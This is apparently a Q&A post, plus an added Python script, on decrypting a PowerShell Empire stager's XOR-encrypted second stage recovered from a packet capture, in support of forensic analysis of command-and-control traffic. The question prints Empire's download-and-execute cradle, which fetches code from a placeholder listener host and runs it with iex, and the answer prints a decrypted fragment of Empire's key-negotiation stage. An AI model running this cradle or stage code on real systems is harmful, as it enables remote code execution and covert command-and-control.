I am working on a project where I want to do two things: take the PowerShell command from a stager plus a pcap of the communication, and decode the command and control stream.
This relates to https://github.com/PowerShellEmpire/Empire
The Base64-decoded PowerShell command looks like this:
```powershell
$wc=new-object system.net.webclient;$u='USERAGENT';$wc.headers.add('user-agent',$u);$wc.proxy = [system.net.webrequest]::defaultwebproxy;$wc.proxy.credentials = [system.net.credentialcache]::defaultnetworkcredentials;$k='SECRETKEY';$i=0;[char[]]$b=([char[]]($wc.downloadstring("http://IPOFLISTENER/index.asp")))|%{$_-bxor$k[$i++%$k.length]};iex ($b-join'')
```
https://github.com/PowerShellEmpire/Empire/wiki/Staging
The wiki says the stager that comes back from the payload 'index.asp' is XOR-encrypted with the staging key. Since I have the stager and the key, how can I recover the plaintext?
This is what I have done so far:
```shell
tshark -nr ~/Desktop/stager.pcap -Y "ip.id == 0x7ba9" -T fields -e data
```
The output is the payload of the response for index.asp, in hex.
The staging key is: ~8yK6]*0N3d&|cZGLm)X_15@S`C#j:n(
In particular, I need to understand this part:
```powershell
|%{$_-bxor$k[$i++%$k.length]};iex ($b-join'')
```
I know that $_ is the value coming in through the pipeline and that bxor XORs it with the key $k. I am not sure what the rest does.
Answer 0 (score: 0)
You need to get both strings into a common format. Let's start with the key.
Assuming ~8yK6]*0N3d&|cZGLm)X_15@S`C#j:n( is just the ASCII-encoded key, we can convert it back to a byte array like this:
```powershell
# convert key string to [byte[]]
$keyString = '~8yK6]*0N3d&|cZGLm)X_15@S`C#j:n('
$key = [System.Text.Encoding]::ASCII.GetBytes($keyString)
```
The encrypted payload from tshark appears to be hex encoded. Fortunately, converting a hex string is fairly simple, since each pair of characters represents one byte:
```powershell
# get ready to convert the encrypted stager payload from hex to [byte[]]
$payloadHex = "<PASTE HEX PAYLOAD FROM TSHARK HERE>"
$payloadHexCount = $payloadHex.Length
# create new [byte[]] for actual payload
$payload = ,0 * ($payloadHexCount / 2)
for($i=0; $i -lt $payloadHexCount; $i+=2)
{
    # convert each char pair to bytes
    $payload[$i / 2] = [System.Convert]::ToByte($payloadHex.Substring($i, 2), 16)
}
```
Then, finally, we just need to XOR the two:
```powershell
# XOR the two byte arrays and concatenate the resulting bytes as char's
$decryptedString = ""
for ($i = 0; $i -lt $payload.Count; $i++){
    $decryptedString += [char]($payload[$i] -bxor $key[$i % $key.Length])
}
```
Ta-da! The payload is decrypted:
```
PS C:\> $decryptedString
FunctION STart-NEGoTIaTe{param($s,$SK,$UA="lol")ADD-TYpe -ASsEMbly SysTem.SeCUrITy;AdD-TYPe -aSsEmBLY SYSTeM.CoRE;$ErrorActionPreference = "SilentlyContinue";$e=[SYSTem.TeXT.EncOdING]::ASCII;$AES=NEw-OBJeCt SYSteM.SeCuRITY.CrYptOGRaphY.AesCRYpTOSErVicePrOVIdER;$IV = [bYte] 0..255 | GEt-RANdoM -counT 16;$AES.Mode="CBC"; $AES.Key=$e.GetBytes($SK); $AES.IV = $IV;$cSP = New-OBject SYStEM.SEcURity.CrYptOgrAphY.CsPPaRamEtErS;$cSP.FlaGs = $CSp.FLAgs -BOR [System.SecuRITy.CRyPTOGraPHY.CspPROvIdErFlAGs]::USeMACHInEKEyStore;$rS = NEw-OBjECT SYsTem.SeCURITY.CRyptOgRAPHy.RSACryptoSERVICEProvIDER -ARgUmentLIST 2048,$cSP;$Rk=$rs.ToXMLStRINg($FaLSe);$r=1..16|FOrEaCH-OBjEct{Get-RandoM -max 26};$ID=('ABCDEFGHKLMNPRSTUVWXYZ123456789'[$R] -JOin '');$ib=$E.GEtbytES($rk);$eb=$IV+$AES.CReaTEENcryPTOr().TRAnsformFINalBLOCk($Ib,0,$ib.LengTh);IF(-not $wc){$wC=New-ObJeCT SYstEm.NeT.WEbCLiENT;$Wc.PROxy = [System.NEt.WEbReQueST]::GETSYSTemWEbPRoXy();$WC.ProxY.CredenTIAlS = [SysTeM.NET.CreDEntiAlCacHe]::DEFauLTCrEDEnTIaLS;}$wc.Headers.Add("User-Agent",$UA);$wc.Headers.Add("Cookie","SESSIONID=$ID");$raw=$wc.UploadData($s+"index.jsp","POST",$eb);$DE=$e.GetStrING($RS.decrYPT($RAw,$fALSE));$EpoCh=$de[0..9] -joIN'';$KeY=$De[10..$DE.LengTh] -jOiN '';$AES=NEW-OBjEcT SystEM.SEcUrItY.CryPToGrAphy.AesCrypToSeRvICePROviDer;$IV = [byTE] 0..255 | GET-RANdoM -COUnt 16;$AES.Mode="CBC"; $AES.Key=$e.GetBytes($key);
```
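The same decoding in Python, as an added example that is neither part of the question or answer nor Empire's own code: it accepts the `tshark -T fields -e data` value in bare-hex or colon-separated form (tshark versions differ, and a stage spanning several packets may print as several lines), applies the stager's repeating-key XOR, and checks that the result is printable script text before trusting the key. The sample input is constructed here by XORing the opening of the decrypted stage shown above with the staging key.

```python
import binascii
import string

# Staging key quoted in the question; the stager XORs each byte of index.asp
# against it, repeating the key ($k[$i++ % $k.length]).
STAGING_KEY = b"~8yK6]*0N3d&|cZGLm)X_15@S`C#j:n("


def tshark_data_to_bytes(field_output: str) -> bytes:
    """Turn the `-T fields -e data` value into raw bytes.

    Accepts a bare hex string or colon-separated byte pairs, possibly split
    over several lines; rejects an odd digit count (truncated capture).
    """
    hex_str = "".join(field_output.split()).replace(":", "")
    if len(hex_str) % 2:
        raise ValueError("odd number of hex digits; payload truncated?")
    return binascii.unhexlify(hex_str)


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the same operation as $_ -bxor $k[$i++ % $k.length]."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_powershell(plaintext: bytes) -> bool:
    """Key sanity check: the stage is printable ASCII script containing '$'."""
    printable = set(string.printable.encode())
    return all(b in printable for b in plaintext) and b"$" in plaintext


def decode_stage(field_output: str, key: bytes = STAGING_KEY) -> str:
    plaintext = xor_with_key(tshark_data_to_bytes(field_output), key)
    if not looks_like_powershell(plaintext):
        raise ValueError("decoded bytes not printable; wrong key or wrong packet")
    return plaintext.decode("ascii")


# Constructed sample: the opening of the decrypted stage from the answer,
# XORed with the key and formatted the way tshark prints the data field.
_SAMPLE_STAGE = b'FunctION STart-NEGoTIaTe{param($s,$SK,$UA="lol")'
SAMPLE_TSHARK_OUTPUT = xor_with_key(_SAMPLE_STAGE, STAGING_KEY).hex(":")

if __name__ == "__main__":
    print(decode_stage(SAMPLE_TSHARK_OUTPUT))
```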